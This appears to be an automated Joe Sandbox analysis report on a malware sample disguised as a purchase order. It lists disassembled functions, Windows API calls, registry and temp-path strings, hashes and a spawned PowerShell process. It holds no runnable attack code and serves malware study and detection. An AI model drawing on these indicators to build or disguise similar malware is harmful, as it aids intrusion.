Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(distributed\Ristingets\,00000023,00000011,00000002), ref: 004024DA
RegSetValueExW.ADVAPI32(?,?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 0040251A
RegCloseKey.ADVAPI32(?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 00402602

Strings

distributed\Ristingets\, xrefs: 004024CB, 004024D9, 004024F0, 00402504, 0040250F

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: distributed\Ristingets\
API String ID: 2655323295-4223474621
Opcode ID: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
Opcode Fuzzy Hash: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58

Uniqueness

Uniqueness Score: -1.00%

Function 00405F51 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F57
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F61
lstrcatW.KERNEL32(?,0040A014), ref: 00405F73

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD

Uniqueness

Uniqueness Score: -1.00%

Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(afsmitningernes), ref: 0040269A

Strings

afsmitningernes, xrefs: 0040265E, 00402683, 00402695, 004026E1
distributed\Ristingets\, xrefs: 00402688

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: lstrlen
String ID: afsmitningernes$distributed\Ristingets\
API String ID: 1659193697-3641217871
Opcode ID: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
Opcode Fuzzy Hash: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E

Uniqueness

Uniqueness Score: -1.00%

Function 0040567B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004056AA
CallWindowProcW.USER32(?,?,?,?), ref: 004056FB

Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F

Strings

, xrefs: 0040568B

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,004067C1,80000002), ref: 00406596
RegCloseKey.ADVAPI32(?), ref: 004065A1

Strings

: Completed, xrefs: 00406557

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405F9D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405FA3
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405FB3

Strings

C:\Users\user\Desktop, xrefs: 00405F9D

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD

Uniqueness

Uniqueness Score: -1.00%

Function 004060D7 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 7764, Parent PID: 7680COMMON

Executed Functions

Function 0704BB00 Relevance: 19.2, Strings: 14, Instructions: 1706COMMON

Download Yara Rule

Strings

tLyk, xrefs: 0704BB2D
4'^q, xrefs: 0704B744
x.xk, xrefs: 0704D359
4'^q, xrefs: 0704C360
tLyk, xrefs: 0704B51B
tLyk, xrefs: 0704BBBA
x.xk, xrefs: 0704C667
4'^q, xrefs: 0704CE25
4'^q, xrefs: 0704C36C
x.xk, xrefs: 0704BA1B
4'^q, xrefs: 0704B7E8
tLyk, xrefs: 0704CD9E
-xk, xrefs: 0704C6B8
-xk, xrefs: 0704BA69

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$tLyk$tLyk$tLyk$tLyk$x.xk$x.xk$x.xk$-xk$-xk
API String ID: 0-2867687932
Opcode ID: 16589e2439701be3e6baf1006bc3e365998806511b67b78db37916a8bac4fee8
Instruction ID: c984bdec0a8a7a26db2d854c7d5401aad05c3fd924221872826143f2ec315515
Opcode Fuzzy Hash: 16589e2439701be3e6baf1006bc3e365998806511b67b78db37916a8bac4fee8
Instruction Fuzzy Hash: F6F25FB4A00218DFDB74DB28C950B9EB7F2BB85304F1089A9D909AB751DB31ED85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0435F000 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02166fbcabe36206240d80a36bedf55a7a7e12948b93697a8307bb9d8b1458a9
Instruction ID: 58374936afe3e12ee7c383882cb6330a549e7e0a08664674372fa092676be087
Opcode Fuzzy Hash: 02166fbcabe36206240d80a36bedf55a7a7e12948b93697a8307bb9d8b1458a9
Instruction Fuzzy Hash: 3CB16E70E00209CFDF14DFA9D985B9EBBF2BF88304F149529D815A7264EB34A946CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0435F8D0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d77084fe762757e0802114ce366e69601fe3b976748e3bf140461dd36f8c74e
Instruction ID: d27cbb04b740b0dff6b9cad98d62a879866d6a91efdd8688a5d9ec7e6e7d9ee7
Opcode Fuzzy Hash: 9d77084fe762757e0802114ce366e69601fe3b976748e3bf140461dd36f8c74e
Instruction Fuzzy Hash: 77B18170E00609DFDF10CFA9D891B9DBBF2AF88318F149529D814EB264EB74A845CF81

Uniqueness

Uniqueness Score: -1.00%

Function 069C0048 Relevance: 19.4, Strings: 15, Instructions: 678COMMON

Download Yara Rule

Strings

4'^q, xrefs: 069C017D
4'^q, xrefs: 069C0189
$^q, xrefs: 069C04A7
$^q, xrefs: 069C046C
tP^q, xrefs: 069C04EC
$^q, xrefs: 069C00EE
$^q, xrefs: 069C0488
4'^q, xrefs: 069C0376
$^q, xrefs: 069C0494
4'^q, xrefs: 069C036A
$^q, xrefs: 069C0450
$^q, xrefs: 069C011F
$^q, xrefs: 069C04B3
$^q, xrefs: 069C010F
tP^q, xrefs: 069C04F8

Memory Dump Source

Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-1262107880
Opcode ID: 8d95849bd966baf4cd726d2482d971a3dd80fa5faf505a20a324dd58ecb027dd
Instruction ID: 61996a34375e76f2d03e29a84fafe18e5a33ab10720d697cd017a2308739e996
Opcode Fuzzy Hash: 8d95849bd966baf4cd726d2482d971a3dd80fa5faf505a20a324dd58ecb027dd
Instruction Fuzzy Hash: C532B431F00204DFDB64CB68C554AAABBE6AF84324F24846ED8059FB55DB33DD45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 07043130 Relevance: 13.1, Strings: 10, Instructions: 648COMMON

Download Yara Rule

Strings

x.xk, xrefs: 0704389C
-xk, xrefs: 070438E1
tP^q, xrefs: 07043414
4'^q, xrefs: 070437D1
4'^q, xrefs: 07043289
4'^q, xrefs: 070437DD
4'^q, xrefs: 07043295
tP^q, xrefs: 07043420
4'^q, xrefs: 07043850
4'^q, xrefs: 0704385C

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$x.xk$-xk
API String ID: 0-986851567
Opcode ID: 623a36cb86bae36b2b67f3a98ad7f3b6dfa7dac94163862b769deea1205d4109
Instruction ID: d36b03d82bdf57aa8e82d89ad3dc9f2edbae47c71090c34f9c462cbbe1ac56d1
Opcode Fuzzy Hash: 623a36cb86bae36b2b67f3a98ad7f3b6dfa7dac94163862b769deea1205d4109
Instruction Fuzzy Hash: 3332C1F0B002059FCB249B68C955BAEFBE2AFC5310F14D579E401AF3A5DB71D8458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0704C751 Relevance: 12.3, Strings: 9, Instructions: 1096COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0704B7E8
-xk, xrefs: 0704C6B8
4'^q, xrefs: 0704B744
4'^q, xrefs: 0704C360
tLyk, xrefs: 0704B51B
x.xk, xrefs: 0704C667
tLyk, xrefs: 0704CB11
-xk, xrefs: 0704BA69
x.xk, xrefs: 0704BA1B

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$tLyk$tLyk$x.xk$x.xk$-xk$-xk
API String ID: 0-203466004
Opcode ID: c2ab7929deef488e22dff0b7d7369fc9c15afaa2e7313b5537e835a95d3962b1
Instruction ID: 974176d9cfbad75f6a3866f614f0571eee7e620836775c0685c265d46f486252
Opcode Fuzzy Hash: c2ab7929deef488e22dff0b7d7369fc9c15afaa2e7313b5537e835a95d3962b1
Instruction Fuzzy Hash: 7FB261B4A002189FDB74DB58CD51B9EB7F2AB84304F10C9A9D80A6B751DB31ED85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07040778 Relevance: 6.8, Strings: 5, Instructions: 591COMMON

Download Yara Rule

Strings

$^q, xrefs: 07040CD5
$^q, xrefs: 07040C61
4'^q, xrefs: 070407E6
$^q, xrefs: 07040CC9
4'^q, xrefs: 070407DA

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 668bc76057ff48a6671588cfec508c4d997f11666fbb2b372337ca7f083d6e53
Instruction ID: 29c37f3cb2c1020bb81ce9c05677713852855b80040e99c0ed6cab75807f2f55
Opcode Fuzzy Hash: 668bc76057ff48a6671588cfec508c4d997f11666fbb2b372337ca7f083d6e53
Instruction Fuzzy Hash: 701257F1B043069FCB649B69C91066ABBE2AFC6210F14C5FAD614DF351DA32DC45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 070447F8 Relevance: 5.8, Strings: 4, Instructions: 820COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07045059
-xk, xrefs: 070453DF
4'^q, xrefs: 0704504D
x.xk, xrefs: 07045391

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$x.xk$-xk
API String ID: 0-471100413
Opcode ID: e4fd6707335ff4d24856964123c34e1dcec14439e58a8280190d22327b286844
